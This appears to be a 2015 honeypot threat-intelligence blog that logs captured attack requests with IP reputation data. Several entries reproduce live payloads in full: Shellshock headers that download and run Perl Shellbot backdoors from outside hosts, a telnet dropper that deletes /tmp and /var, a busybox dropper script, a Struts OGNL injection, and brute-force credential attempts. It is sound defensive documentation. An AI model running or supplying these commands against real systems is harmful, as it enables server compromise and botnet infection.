Samstag, 31. Oktober 2015

193.107.88.186 - Backdoor.Perl.Shellbot.jf via tecnoalianza.com

BEGIN OF HTTP DATA:
2015-10-31 01:14:48
Source IP: 193.107.88.186
Country: PL RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://tecnoalianza.com/a.log -O /tmp/a.log;curl -O /tmp/a.log http://tecnoalianza.com/a.log;perl /tmp/a.log;rm -rf /tmp/a.log*");'
Host: 195.169.125.87
Connection: Close

Domain Name: TECNOALIANZA.COM (66.240.252[.]12)
Registry Domain ID: 137741512_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.tucows.com
Registrar URL: http://tucowsdomains.com
Updated Date: 2014-12-18T11:44:43Z

193.107.88[.]186

    Static Source: GeoIP data
  • Country: Poland
  • ASN: AS48505 Kylos sp. z o.o.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/193.107.88.186

Feed search for 193.107.88[.]186

66.240.252[.]12

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS10439 CariNet, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/66.240.252.12

Feed search for 66.240.252[.]12

Dienstag, 27. Oktober 2015

222.186.21.181 - ORACLE DB access

BEGIN OF ORACLE DATA:
2015-10-27 00:48:15
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@l^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@2^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(CONNECT_DATA=(COMMAND=status)(VERSION=169869568))
 END OF DATA

BEGIN OF ORACLE DATA:
2015-10-27 00:48:16
Source IP: 222.186.21.181
Country: CN RiskScore: 10 Malware: []
^@<D1>^@^@^A^@^@^@^A6^A,^@^@^H^@^?<FF>^?^H^@^@^@^A^@<97>^@:^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@4<E6>^@^@^@^A^@^@^@^@^@^@^@^@(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=dhaxxor))(COMMAND=status)(ARGUMENTS=64)(PASSWORD=dhaxxor)(SERVICE=LISTENER)(VERSION=135294976)))
 END OF DATA
Mainly I report this cause it was the first traffic found on the fake Oracle port. Even though User/Password dhaxxor does not look like a honest attempt.

222.186.21[.]181

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/222.186.21.181
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/222.186.21.181
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Samstag, 24. Oktober 2015

218.94.94.86 - Shellshock perl via http://www.testvc.it/TESTONLY

BEGIN OF HTTP DATA:
2015-10-24 04:41:02
Source IP: 218.94.94.86
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget -O /dev/null http://www.testvc.it/TESTONLY; curl -O /dev/null http://www.testvc.it/TESTONLY; fetch http://www.testvc.it/TESTONLY; GET http://www.testvc.it/TESTONLY; lwp-download http://www.testvc.it/TESTONLY; lynx http://www.testvc.it/TESTONLY");'
Host: 109.234.106.8
Connection: Close

218.94.94[.]86

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/218.94.94.86
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
testvc.it

Registran
Organization:     MADE TO SELL SRL
Address:            VIA VITTORIO EMANUELE 33
                           CALENZANO                   

62.48.49[.]78

    Static Source: GeoIP data
  • Country: Italy
  • ASN: AS13284 Playnet S.R.L.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.48.49.78

185.93.185.47 - Shellsock ping to 212.47.238.143

BEGIN OF HTTP DATA:
2015-10-23 22:18:50
Source IP: 185.93.185.47
Country: UA RiskScore: 10 Malware: []
GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close

212.47.238[.]143

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/212.47.238.143

Feed search for 212.47.238[.]143

185.93.185[.]47

    Static Source: GeoIP data
  • Country: Ukraine
  • ASN: AS204209 Individual entrepreneur Tereschenko Marina Evgenievna
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/185.93.185.47
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/185.93.185.47

Feed search for 185.93.185[.]47

221.3.153.172 - Backdoor Perl Shelbot vi http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh

BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 221.3.153[.]172

    Source: Local Feed Database
  • Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
  • Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
  • In db since: 2015-10-21 13:01:19.504158

Mittwoch, 21. Oktober 2015

74.94.108.29 - wp_woocommerce / virtuemart Cookie and Auth

EGIN OF HTTP DATA:
2015-10-21 10:56:18
Source IP: 74.94.108.29
Country: US RiskScore: 1 Malware: []
GET http://ya.ru:80/ HTTP/1.1
Content-Type: text/html
Host: ya.ru
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)
Authorization: Basic Og==
Cookie: nl-wag-lbsession=493641290.39121.584371104.3216573472; JSESSIONID=3F318DEF20EA379FF67AA05B51374618; 9db8b84e697d8de7acd04dee7393b60a=ae337258da9910c1feaf1f03b9df7725; wfvt_4053413342=56274d2d95c4e; CFTOKEN=98030C9E-58DE-4492-AAA47B1510FA5BF7; CFID=12366; ASPSESSIONIDQCAABTCD=PBIANEADMJBMMEHPKHPEKMAP; ASPSESSIONIDQASRRQRB=LCAABDADJPOGJALLBHMBGNBN; ASPSESSIONIDACACCQTS=BNGFBDADHOLOELKAMDJIFEME; ASPSESSIONIDCQTSABBT=CECMJGADBKMGLMCECPFLFPNN; ASPSESSIONIDAQDACTSD=AKIFDJDDAJNIJNAHIHELNJIB; X-Mapping-jfocjcpm=A58326710875159DFD1FE605A98F3A80; X-Mapping-ihnbadbn=8BEBCF55946DB931DDF1C87D24A0415C; X-Mapping-jdinjeol=FFDF3B29993B876585FCDFA9909EF15F; wp_shopp_bc38cde85b50c10d9bdebb0eb9193993=0ba9c5b80f14e3f69860cda7509a7077; site[currency]=Q2FrZQ%3D%3D.vETn; CmsDomain=ya.ru; incap_ses_199_81566=CowODjN5bwLj6hkOvh7DAvZKJ1YAAAAAB+BCoPnonUJVBYCp5xUKeQ==; incap_ses_407_81566=ZiaWKzMEIgHDhOlfWvSlBfVKJ1YAAAAAfo/1rHWeppqZ6cdvfuJygQ==; incap_ses_406_81566=VOYzJLd34ACTtwr062aiBfNKJ1YAAAAA5nUs9H2KvROsHSxk0yOoEg==;
 incap_ses_401_81566=1LbWZCya8SvkuymvnKOQBfVKJ1YAAAAAy8RJbgwe/Y9PBd7XDw6cGg==; incap_ses_120_81566=2RjJBLglW191UoOJbVOqAdJKJ1YAAAAAf1UQwaBqr5Q2wMpPHAQzaw==; incap_ses_261_81566=GZFGVnd3gXbLg9D+zkKfA9FKJ1YAAAAA2WcQTAGttQIVGqAIjg7fRg==; incap_ses_315_81566=x1z+JLhBoEOPMkXlOBtfBNBKJ1YAAAAAqbuqN5aJ+t3aC1WvABbnpw==; incap_ses_313_81566=/PXnYr1CfhNBs2r3LwBYBNBKJ1YAAAAA3TQ/Y6pEe9RAPouemwDbXg==; incap_ses_305_81566=RGA+XGM6xmecIhByTZQ7BM5KJ1YAAAAA3rjxLOTABAkf53cptw7paw==; incap_ses_288_81566=3Kc0cX2Hr3j8MJEq4i7/A8NKJ1YAAAAAAt+Y5yuHzk8KE/HuJXRI9g==; incap_ses_287_81566=w/wICF7G1GDzkOg8TKH7A79KJ1YAAAAAUL1px1Y01QJyJ/n/pGVI8A==; incap_ses_200_81566=OAVsNLkUm354oNE05YvGAqlKJ1YAAAAAxuJV8VYMtg3gV6RmKu1wew==; visid_incap_81566=8xGGpkYVRvilOCRZozp2W6lKJ1YAAAAAQUIPAAAAAADRL/a6/cPFkRp0rDsRnGWo; imp=S_n8yXBXBcel4PcTxg63NoDy6Loe610223Z0000Z0; ASPSESSIONIDSQTCSTCS=FKOFIBOCFBFEMNCGEPPIJDLF; bd45d1676dea992b2a6b94dd527b20c2=7011dcd6fd478fc235e3040e6a279ae1; virtuemart=36939bcb581af13e6e7823e25bad5880;
 d0c6e38cc40e095b29d8a68f70508dee=-; wp_woocommerce_session_fa8c6534742fba09c695479b86b3f50d=0e49327a58656322f9d7b3401f1d4603%7C%7C1445585631%7C%7C1445582031%7C%7C365c5ab325c06e102f5b29921898a4f2; uEUb_2132_lastact=1445412735%09forum.php%09; uEUb_2132_sid=InzUW5; uEUb_2132_lastvisit=1445409135; uEUb_2132_saltkey=YKpFR7pK; rg_cookie_session_id=549763849; PIWIK_SESSID=10361ae0ab110d2b93baf4907dde252d; corebb7bvisit=1445412063; GBALID=web01; ASPSESSIONIDSQBCDAQD=BHHHPNOABKBFDHFICLIHIFME; BIGipServerwww.agnis.net-HTTP=2493880074.20480.0000; EkAnalytics=0; EktGUID=66e92cf7-6a60-496f-aae8-11a40c0bac96; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=ya.ru&SiteLanguage=1033; CID=7ae028d37d407c5edcf586b3396dfcd75c48bed9s%3A40%3A%22d51ce68a4e9c6f58aa7ae28ce3b41bbd6e8738b1%22%3B; juSecondLang=fa; juFirstLang=en;
 PHPSESSID=c4fa633918d04c44e65d62eb7735adc8; ASPSESSIONIDQQRQRCDC=ILLFLNJDDBNCMELHLKFFGFBJ; Cacti=n1rek3j8pdj08nvj8bi6ot8dj5; ASP.NET_SessionId=3zc024ndj3yvajcyw5rw2vp1; .ASPXANONYMOUS=PB2ACGBC0QEkAAAAMjI2Mzg0OTMtYzk3My00NGE0LTkxYzgtZmE2MWUzY2U5MGUy--uyzTEzsohzI0t45c49Aeo2c2UuUsTfNVKkGB8VVk81; AIROS_SESSIONID=757da0eccfd2ab191585a35dd22cfde9; 1f9adce772dab79ce17b47eeff21ce20=3bc5dcaf79f897eeb113a3d87c756a55
Not to mention that this Honeypot does not run and content except "Hello World"

74.94.108[.]29

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS7922 Comcast Cable Communications, Inc.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/74.94.108.29


Montag, 19. Oktober 2015

87.106.142.17 - Wordpress xmlrpc.php

BEGIN OF HTTP DATA:
2015-10-19 13:43:02
Source IP: 87.106.142.17
Country: DE RiskScore: 1 Malware: []
POST /xmlrpc.php HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check

<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>

87.106.142[.]17

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS8560 1&1 Internet AG
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/87.106.142.17

Donnerstag, 15. Oktober 2015

113.126.198.158 - Telnet code execution after login, download via 158.69.203.229

BEGIN OF TELNET DATA:
2015-10-14 09:48:52
Source IP: 113.126.198.158
Country: CN RiskScore: 2.9 Malware: []
sh
shelrm -rf /tmp/* /var/*;cd /tmp || cd /var/;wget http://158.69.203.229/ff.sh;sh ff.sh;ftpget -u anonymous -p anonymous 158.69.203.229 ff2.sh ff2.sh;sh ff2.sh;tftp -r ff3.sh -g 158.69.203.229;sh ff3.sh
User: root
Pass:

 END OF DATA
The first script is a simple
#!/bin/sh
cp /bin/busybox ./
wget http://158.69.203.229/arm;cat arm >busybox;rm -f arm;chmod 777 busybox;./busybox
wget http://158.69.203.229/mips;cat mips >busybox;rm -f mips;./busybox
wget http://158.69.203.229/mipsel;cat mipsel >busybox;rm -f mipsel;./busybox
wget http://158.69.203.229/ppc;cat ppc >busybox;rm -f ppc;./busybox
wget http://158.69.203.229/sh;cat sh >busybox;rm -f sh;./busybox
The FTP server is also public available
ftp> ls
227 Entering Passive Mode (158,69,203,229,209,227)
150 Opening ASCII mode data connection for file list
-rwxr-xr-x   1 root     root        41652 Oct 12 23:33 arm
-rw-r--r--   1 root     root          523 Oct 10 17:04 ff2.sh
-rwxr-xr-x   1 root     root        50743 Oct 15 03:28 find
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mips
-rwxr-xr-x   1 root     root        61572 Oct 12 23:33 mipsel
-rwxr-xr-x   1 root     root        41128 Oct 12 23:33 ppc
-rwxr-xr-x   1 root     root        38324 Oct 12 23:33 sh
The file sh is
sh: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
The files are available via my DRIVE share 
the password is "infected" 

158.69.203[.]229

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/158.69.203.229

Feed search for 158.69.203[.]229

113.126.198[.]158

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: IBM X-Force Exchange
  • Score: 2.9
  • Reference: https://exchange.xforce.ibmcloud.com/ip/113.126.198.158
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/113.126.198.158

Feed search for 113.126.198[.]158


 
 
 

Dienstag, 13. Oktober 2015

186.56.42.11 - Shellschock attemp via 46.105.96.205

BEGIN OF HTTP DATA:
2015-10-13 07:26:22
Source IP: 186.56.42.11
Country: AR RiskScore: 10 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 46.105.96.205/TEST231;curl 46.105.96.205/TEST231;fetch 46.105.96.205/TEST231;lwp-download 46.105.96.205/TEST231;GET 46.105.96.205/TEST231");'
Host: 195.169.125.87
Connection: Close

46.105.96[.]205

    Static Source: GeoIP data
  • Country: France
  • ASN: AS16276 OVH SAS
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/46.105.96.205

186.56.42[.]11
    Static Source: GeoIP data
  • Country: Argentina
  • ASN: AS22927 Telefonica de Argentina
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/186.56.42.11
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/186.56.42.11
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt


Montag, 12. Oktober 2015

221.3.153.172 - perl Trojan via Shellshock - CC 69.89.2.153

BEGIN OF HTTP DATA:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close
Clamav report it as:


license.txt: Trojan.Perl.Shellbot-2 FOUND

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt


 The hardcoded C&C address is

69.89.2[.]153

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS20141 Quality Technology Services, LLC.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/69.89.2.153

Samstag, 10. Oktober 2015

199.115.117.88 - GET /admin/i18n/readme.txt

BEGIN OF HTTPS DATA:
2015-10-09 16:41:51
Source IP: 199.115.117.88
Country: US RiskScore: 8.6 Malware: []
GET /admin/i18n/readme.txt HTTP/1.1
Host: 195.169.125.87
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.8.0

199.115.117[.]88

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS30633 Leaseweb USA, Inc.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/199.115.117.88
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/199.115.117.88
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

61.186.245.211 - com.opensymphony.xwork2

BEGIN OF HTTP DATA:
2015-10-09 20:30:25
Source IP: 61.186.245.211
Country: CN RiskScore: 1 Malware: []
POST /getNews.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: 195.169.125.87
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
 END OF DATA

61.186.245[.]211

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.186.245.211
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

177.157.43.206 - /webcalendar/install/index.php

BEGIN OF HTTP DATA:
2015-10-10 01:01:15
Source IP: 177.157.43.206
Country: BR RiskScore: 1 Malware: []
GET /webcalendar/install/index.php HTTP/1.1
TE: deflate,gzip;q=0.3
Keep-Alive: 300
Connection: Keep-Alive, TE
Host: 195.169.125.87
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
Catched my eye because of an available exploit for calendar see here
https://www.exploit-db.com/exploits/18775/

177.157.43[.]206

    Static Source: GeoIP data
  • Country: Brazil
  • ASN: AS18881 Global Village Telecom
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/177.157.43.206
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Donnerstag, 8. Oktober 2015

208.100.26.231 - MongoDB scanning ip

I found the IP scanning and sending random data to almost all services on my honeypot.

28 events like
BEGIN OF MONGODB DATA:
2015-10-09 00:11:14
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
GET / HTTP/1.0

208.100.26[.]231

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 208.100.26[.]231

    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000

Mittwoch, 7. Oktober 2015

208.100.26.230 - Several FTP attempts

BEGIN OF FTP DATA:
2015-10-08 02:08:56
Source IP: 208.100.26.230
Country: US RiskScore: 1 Malware: []
 Basically every access method was tried to use, in the logs I can see
  • HTTP
  • Kerberos
  • Lanman
  • etc.

208.100.26[.]230

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.230
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Dienstag, 6. Oktober 2015

62.210.157.90 - shellbot via 23.229.121.186

BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"
When I try to download the malware, Zonealarm reports a
Backdoor.Perl.Shellbot.s


62.210.157[.]90

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.210.157.90
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

23.229.121[.]186

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36352 ColoCrossing
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/23.229.121.186

Sonntag, 4. Oktober 2015

187.210.107.242 - wget from 79.99.248.2

BEGIN OF HTTP DATA:
2015-10-04 16:57:03
Source IP: 187.210.107.242
Country: MX RiskScore: 10 Malware:
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 79.99.248.2/TEST231;curl 79.99.248.2/TEST231;fetch 79.99.248.2/TEST231;lwp-download 79.99.248.2/TEST231;GET 79.99.248.2/TEST231");'
Host: 109.234.106.8
Connection: Close


79.99.248[.]2

    Static Source: GeoIP data
  • Country: Georgia
  • ASN: AS44877 Vtel-Georgia
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/79.99.248.2

187.210.107[.]242

    Static Source: GeoIP data
  • Country: Mexico
  • ASN: AS8151 Uninet S.A. de C.V.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/187.210.107.242
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/187.210.107.242
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Dynamic Source: projecthoneypot.org
  • Last seen: 20 day(s) ago
  • Score: 25 (25 = 100 Spam per day, 75 = 1mio Spam per day)
  • Category: Suspicious (1)


Samstag, 3. Oktober 2015

61.160.247.11 . Authorization: Basic attempts

BEGIN OF HTTP DATA:
2015-10-02 08:08:13
Source IP: 61.160.247.11
Country: CN RiskScore: 1 Malware: []
GET /manager/html HTTP/1.1
Authorization: Basic cm9vdDpzM2NyZXQ=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host:4393160:80

61.160.247[.]11

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.247.11
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Authorization: Basic cm9vdDphZG1pbg==
Authorization: Basic cm9vdDp0b21jYXQ=
Authorization: Basic cm9vdDpyb290
Authorization: Basic cm9vdDpwYXNzd29yZA==
Authorization: Basic cm9vdDpzM2NyZXQ=
